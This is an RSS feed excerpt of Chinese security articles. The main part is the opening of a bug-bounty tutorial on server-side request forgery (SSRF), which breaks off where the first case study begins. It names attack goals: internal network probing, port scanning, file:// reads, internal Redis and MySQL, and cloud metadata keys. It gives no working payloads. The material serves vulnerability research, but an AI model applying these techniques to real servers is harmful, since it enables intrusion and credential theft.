255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5493333333333333" data-s="300,640" data-type="png" data-w="750" data-imgfileid="100012574" src="https://wechat2rss.xlab.app/img-proxy/?k=033161f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FYmmVSe19Qj5EMr3X76qdKBrhIIkBlVVyuiaiasseFZ9LqtibyKFk7gXvgTU2C2yEwKLaaqfX0DL3eoH6gTcNLJvDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span style="box-sizing: border-box;text-align: center;display: inline-block;height: 38px;line-height: 42px;color: rgb(72, 179, 120);background-position: left center;background-repeat: no-repeat;background-attachment: initial;background-origin: initial;background-clip: initial;background-size: 63px;margin-top: 38px;font-size: 18px;margin-bottom: 10px;"><span leaf="">往期回顾</span></span></p><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497813&amp;idx=1&amp;sn=c778ad6a4bffd7a0a72a900144ea90ca&amp;scene=21#wechat_redirect" textvalue="如何利用ai辅助挖漏洞" data-itemshowtype="0" linktype="text" data-linktype="2">如何利用ai辅助挖漏洞</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497880&amp;idx=1&amp;sn=b9b980464333074216b55ea94c8a743a&amp;scene=21#wechat_redirect" textvalue="如何在移动端抓包-下" data-itemshowtype="0" linktype="text" data-linktype="2">如何在移动端抓包-下</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;h1&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;activity-name&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497491&amp;idx=1&amp;sn=a1b00b9a8a54eb96aa3ba8bf23cb7e28&amp;scene=21#wechat_redirect" textvalue="如何绕过签名校验" data-itemshowtype="0" linktype="text" data-linktype="2">如何绕过签名校验</a></span></h1><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495880&amp;idx=1&amp;sn=65d42fbff5e198509e55072674ac5283&amp;chksm=e8a5faabdfd273bd55df8f7db3d644d3102d7382020234741e37ca29e963eace13dd17fcabdd&amp;scene=21#wechat_redirect" textvalue="一款bp神器" data-itemshowtype="0" linktype="text" data-linktype="2">一款bp神器</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496898&amp;idx=1&amp;sn=b6088e20a8b4fc9fbd887b900d8c5247&amp;scene=21#wechat_redirect" textvalue="挖掘有回显ssrf的隐藏payload" data-itemshowtype="0" linktype="text" data-linktype="2">挖掘有回显ssrf的隐藏payload</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495841&amp;idx=1&amp;sn=bbf477afa30391b8072d23469645d026&amp;chksm=e8a5fac2dfd273d42344f18c7c6f0f7a158cca94041c4c4db330c3adf2d1f77f062dcaf6c5e0&amp;scene=21#wechat_redirect" textvalue="ssrf绕过新思路" data-itemshowtype="0" linktype="text" data-linktype="2">ssrf绕过新思路</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496380&amp;idx=1&amp;sn=78c0c4c67821f5ecbe4f3947b567eeec&amp;chksm=e8a5f8dfdfd271c935aeb4444ea7e928c55cb4c823c51f1067f267699d71a1aad086cf203b99&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">一个辅助测试ssrf的工具</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247488819&amp;idx=1&amp;sn=5141f88f3e70b9c97e63a4b68689bf6e&amp;chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">dom-xss精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487187&amp;idx=1&amp;sn=622438ee6492e4c639ebd8500384ab2f&amp;chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">年度精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487122&amp;idx=1&amp;sn=32459310408d126aa43240673b8b0846&amp;chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">Nuclei权威指南-如何躺赚</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486973&amp;idx=1&amp;sn=6ec419db11ff93d30aa2fbc04d8dbab6&amp;chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试设置功能IV</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试注册功能以及相关Tips</a></span><span style="display: none;line-height: 0px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">‍</a></span></span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=c0e168e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRy6XGOpTglnzZBc0kWYs7H60BPVkK1iaaBLSIic7hShxYMbx3KIEnXN6BibCTN0GapJQQYL2fTkWWwtdqRsYew5N2vLad5ExgPP1s%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style="box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span leaf="">参考</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><a href="https://hackerone.com/reports/1629828" target="_blank">https://hackerone.com/reports/1629828</a></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=7f276dcb&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499367%26idx%3D1%26sn%3D84d91eb8c3a1b7dd51fa922fad1f8db9">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 28 Apr 2026 10:01:00 +0800</pubDate>
    </item>
    <item>
      <title>【SRC实战】从0到内网访问：SSRF</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499361&amp;idx=1&amp;sn=dfdaec5067727fdc3bb907b4d1ed39f4</link>
      <description></description>
      <content:encoded><![CDATA[<p><span>隐雾安全</span> <span>2026-04-27 10:01</span> <span style="display: inline-block;">四川</span></p>




  <p>以下文章来源于：隐雾安全</p>
  <strong>隐雾安全</strong>
  <p>隐雾，为您提供职业成功的关键。</p>



  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=7d6c298e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F7xtecWUgCRy5WDcEyoO06uD4qia13RW826KZlBic3k5Rhvpnqmd1zICH3nxU3EOA4NiaBGXlTcLFvLVJsPAURCstiadqKd4uBEvZd8TnQWtLRibc%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);margin-bottom: 24px;" data-pm-slice="0 0 []"><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: -7px 0px 10px;box-sizing: border-box;"><div style="display: inline-block;width: 96%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;background-color: rgba(138, 192, 245, 0.09);padding: 20px;height: auto;border-left-style: solid;border-left-width: 5px;border-radius: 2px;overflow: hidden;margin: 0px 0px 20px;box-sizing: border-box;"><div style="text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">📝 </span><strong style="box-sizing: border-box;"><span leaf="">编者语</span></strong></p></div><div style="text-align: left;font-size: 15px;color: rgb(54, 54, 54);letter-spacing: 2px;line-height: 2;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">SSRF这个漏洞，它不像XSS那样“容易有反馈”，而且往往藏在一些不太起眼的功能里，比如：头像、模板、接口请求、甚至是一些“看起来只是展示内容”的地方。</span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这篇文章，我们不只是讲“漏洞是什么”，更重要的是讲清楚：</span></p></div><div style="margin: 10px 0% 8px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-left: 3px solid rgb(219, 219, 219);border-bottom-left-radius: 0px;padding: 0px 0px 0px 8px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="color: rgba(0, 0, 0, 0.5);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这个漏洞，是怎么一步一步被挖出来的。</span></p></div></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 10px 0px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 5%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 4px 0px 10px;box-sizing: border-box;"><div style="display: inline-block;width: 27px;height: 27px;vertical-align: top;overflow: hidden;background-color: rgb(30, 30, 30);box-shadow: rgb(219, 219, 219) 7px 7px 0px 0px;box-sizing: border-box;"><div style="text-align: center;margin: 0px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1</span></p></div></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;padding: 0px 0px 0px 10px;border-style: solid;border-width: 0px 0px 1px;box-sizing: border-box;"><div style="font-size: 22px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">什么是 SSRF？</span></p></div></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">先用一句话解释：</span></p></div><div style="margin: 10px 0% 8px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 3px solid rgb(219, 219, 219);border-bottom-left-radius: 0px;padding: 0px 0px 0px 8px;align-self: flex-start;box-sizing: border-box;"><div style="color: rgb(77, 77, 77);font-family: SourceHan-S-SC;text-align: justify;letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;width: 100%;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">SSRF=让服务器帮你去请求你指定的地址</span></strong></p></div></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);text-shadow: rgb(51, 51, 51) 1px 1px 0px, rgb(51, 51, 51) 1px -1px 0px, rgb(51, 51, 51) -1px 1px 0px, rgb(51, 51, 51) -1px -1px 0px, rgb(51, 51, 51) 0px 1.4px 0px, rgb(51, 51, 51) 0px -1.4px 0px, rgb(51, 51, 51) -1.4px 0px 0px, rgb(51, 51, 51) 1.4px 0px 0px, rgb(239, 112, 96) 2px 2px 0px, rgb(239, 112, 96) 3px 3px 0px, rgb(239, 112, 96) 3px 1px 0px, rgb(255, 222, 23) 1px 3px 0px, rgb(255, 222, 23) 1px 1px 0px, rgb(255, 222, 23) 2px 3.4px 0px, rgb(255, 222, 23) 2px 0.6px 0px, rgb(239, 112, 96) 0.6px 2px 0px, rgb(239, 112, 96) 3.4px 2px 0px;letter-spacing: 3px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">举个例子</span></em></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">正常情况：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">你访问：</span></p></div><div style="margin: 10px 0% 8px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 3px solid rgb(219, 219, 219);border-bottom-left-radius: 0px;padding: 0px 0px 0px 8px;align-self: flex-start;box-sizing: border-box;"><div style="color: rgb(54, 54, 54);font-size: 15px;text-align: justify;letter-spacing: 2px;line-height: 2;width: 100%;box-sizing: border-box;"><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__attr">http</span>:<span class="code-snippet__comment">//example.com/avatar.jpg</span></span></code></pre></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">是你自己的浏览器去请求。</span></p></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">但如果存在 SSRF：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">你输入一个地址：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">实际请求的是服务器，而不是你。</span></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);text-shadow: rgb(51, 51, 51) 1px 1px 0px, rgb(51, 51, 51) 1px -1px 0px, rgb(51, 51, 51) -1px 1px 0px, rgb(51, 51, 51) -1px -1px 0px, rgb(51, 51, 51) 0px 1.4px 0px, rgb(51, 51, 51) 0px -1.4px 0px, rgb(51, 51, 51) -1.4px 0px 0px, rgb(51, 51, 51) 1.4px 0px 0px, rgb(239, 112, 96) 2px 2px 0px, rgb(239, 112, 96) 3px 3px 0px, rgb(239, 112, 96) 3px 1px 0px, rgb(255, 222, 23) 1px 3px 0px, rgb(255, 222, 23) 1px 1px 0px, rgb(255, 222, 23) 2px 3.4px 0px, rgb(255, 222, 23) 2px 0.6px 0px, rgb(239, 112, 96) 0.6px 2px 0px, rgb(239, 112, 96) 3.4px 2px 0px;letter-spacing: 3px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">为什么有危险？</span></em></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">因为服务器能访问很多你访问不到的东西：</span></p></div><p style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">内网 IP（10.0.0.1/192.168.x.x / 172.x.x.x）</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">内网服务（Redis / MySQL / 管理后台）</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">云服务元数据（比如 AK / SK）</span></p></li></ul></p><div style="font-size: 15px;color: rgb(54, 54, 54);letter-spacing: 2px;line-height: 2;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">换句话说：</span></p></div><div style="margin: 10px 0% 8px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 3px solid rgb(219, 219, 219);border-bottom-left-radius: 0px;padding: 0px 0px 0px 8px;align-self: flex-start;box-sizing: border-box;"><div style="color: rgb(77, 77, 77);font-family: SourceHan-S-SC;text-align: justify;letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;width: 100%;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">SSRF=一个可以让你“借服务器视角看世界”的漏洞</span></strong></p></div></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);text-shadow: rgb(51, 51, 51) 1px 1px 0px, rgb(51, 51, 51) 1px -1px 0px, rgb(51, 51, 51) -1px 1px 0px, rgb(51, 51, 51) -1px -1px 0px, rgb(51, 51, 51) 0px 1.4px 0px, rgb(51, 51, 51) 0px -1.4px 0px, rgb(51, 51, 51) -1.4px 0px 0px, rgb(51, 51, 51) 1.4px 0px 0px, rgb(239, 112, 96) 2px 2px 0px, rgb(239, 112, 96) 3px 3px 0px, rgb(239, 112, 96) 3px 1px 0px, rgb(255, 222, 23) 1px 3px 0px, rgb(255, 222, 23) 1px 1px 0px, rgb(255, 222, 23) 2px 3.4px 0px, rgb(255, 222, 23) 2px 0.6px 0px, rgb(239, 112, 96) 0.6px 2px 0px, rgb(239, 112, 96) 3.4px 2px 0px;letter-spacing: 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">SSRF常见利用方向</span></em></strong></p></div></div><div style="font-size: 15px;color: rgb(54, 54, 54);letter-spacing: 2px;line-height: 2;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">简单列几个在挖洞时要注意的地方：</span></p></div><p style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">探测内网 IP</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫描端口</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">读取本地文件（file://）</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">打内部接口</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">结合其他漏洞（XSS / 文件读取）</span></p></li></ul></p><div style="margin: 10px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);text-shadow: rgb(51, 51, 51) 1px 1px 0px, rgb(51, 51, 51) 1px -1px 0px, rgb(51, 51, 51) -1px 1px 0px, rgb(51, 51, 51) -1px -1px 0px, rgb(51, 51, 51) 0px 1.4px 0px, rgb(51, 51, 51) 0px -1.4px 0px, rgb(51, 51, 51) -1.4px 0px 0px, rgb(51, 51, 51) 1.4px 0px 0px, rgb(239, 112, 96) 2px 2px 0px, rgb(239, 112, 96) 3px 3px 0px, rgb(239, 112, 96) 3px 1px 0px, rgb(255, 222, 23) 1px 3px 0px, rgb(255, 222, 23) 1px 1px 0px, rgb(255, 222, 23) 2px 3.4px 0px, rgb(255, 222, 23) 2px 0.6px 0px, rgb(239, 112, 96) 0.6px 2px 0px, rgb(239, 112, 96) 3.4px 2px 0px;letter-spacing: 3px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">SSRF漏洞一般藏在哪？</span></em></strong></p></div></div><div style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">个高频点</span></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);text-shadow: rgb(51, 51, 51) 1px 1px 0px, rgb(51, 51, 51) 1px -1px 0px, rgb(51, 51, 51) -1px 1px 0px, rgb(51, 51, 51) -1px -1px 0px, rgb(51, 51, 51) 0px 1.4px 0px, rgb(51, 51, 51) 0px -1.4px 0px, rgb(51, 51, 51) -1.4px 0px 0px, rgb(51, 51, 51) 1.4px 0px 0px, rgb(239, 112, 96) 2px 2px 0px, rgb(239, 112, 96) 3px 3px 0px, rgb(239, 112, 96) 3px 1px 0px, rgb(255, 222, 23) 1px 3px 0px, rgb(255, 222, 23) 1px 1px 0px, rgb(255, 222, 23) 2px 3.4px 0px, rgb(255, 222, 23) 2px 0.6px 0px, rgb(239, 112, 96) 0.6px 2px 0px, rgb(239, 112, 96) 3.4px 2px 0px;letter-spacing: 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">到这里，这个漏洞其实已经成型了</span></em></strong></p></div></div><p style="font-family: SourceHan-S-SC;color: rgb(77, 77, 77);letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;box-sizing: border-box;"><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">图片加载（头像 / URL 图片）</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">模板解析（简历 / 富文本 / iframe）</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">接口请求（URL 参数）</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">文件解析 / 转换</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">第三方资源加载</span></p></li></ul></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">一句话总结：</span></p><div style="margin: 10px 0% 8px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 3px solid rgb(219, 219, 219);border-bottom-left-radius: 0px;padding: 0px 0px 0px 8px;align-self: flex-start;box-sizing: border-box;"><div style="color: rgb(77, 77, 77);font-family: SourceHan-S-SC;text-align: justify;letter-spacing: 1.5px;line-height: 1.75;padding: 0px 10px;width: 100%;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">只要有“服务器去请求外部资源”的地方，就可能有 SSRF</span></strong></p></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 10px 0px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 5%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 4px 0px 10px;box-sizing: border-box;"><div style="display: inline-block;width: 27px;height: 27px;vertical-align: top;overflow: hidden;background-color: rgb(30, 30, 30);box-shadow: rgb(219, 219, 219) 7px 7px 0px 0px;box-sizing: border-box;"><div style="text-align: center;margin: 0px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2</span></p></div></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;padding: 0px 0px 0px 10px;border-style: solid;border-width: 0px 0px 1px;box-sizing: border-box;"><div style="font-size: 22px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">案例讲解</span></p></div></div></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);text-shadow: rgb(51, 51, 51) 1px 1px 0px, rgb(51, 51, 51) 1px -1px 0px, rgb(51, 51, 51) -1px 1px 0px, rgb(51, 51, 51) -1px -1px 0px, rgb(51, 51, 51) 0px 1.4px 0px, rgb(51, 51, 51) 0px -1.4px 0px, rgb(51, 51, 51) -1.4px 0px 0px, rgb(51, 51, 51) 1.4px 0px 0px, rgb(239, 112, 96) 2px 2px 0px, rgb(239, 112, 96) 3px 3px 0px, rgb(239, 112, 96) 3px 1px 0px, rgb(255, 222, 23) 1px 3px 0px, rgb(255, 222, 23) 1px 1px 0px, rgb(255, 222, 23) 2px 3.4px 0px, rgb(255, 222, 23) 2px 0.6px 0px, rgb(239, 112, 96) 0.6px 2px 0px, rgb(239, 112, 96) 3.4px 2px 0px;letter-spacing: 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">案例一：从“模板功能”，到SSRF全回显</span></em></strong></p></div></div><div style="margin: 20px 0%;box-sizing: border-box;"><div style="font-size: 14px;color: rgb(249, 110, 87);letter-spacing: 2px;line-height: 2.2;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">1. 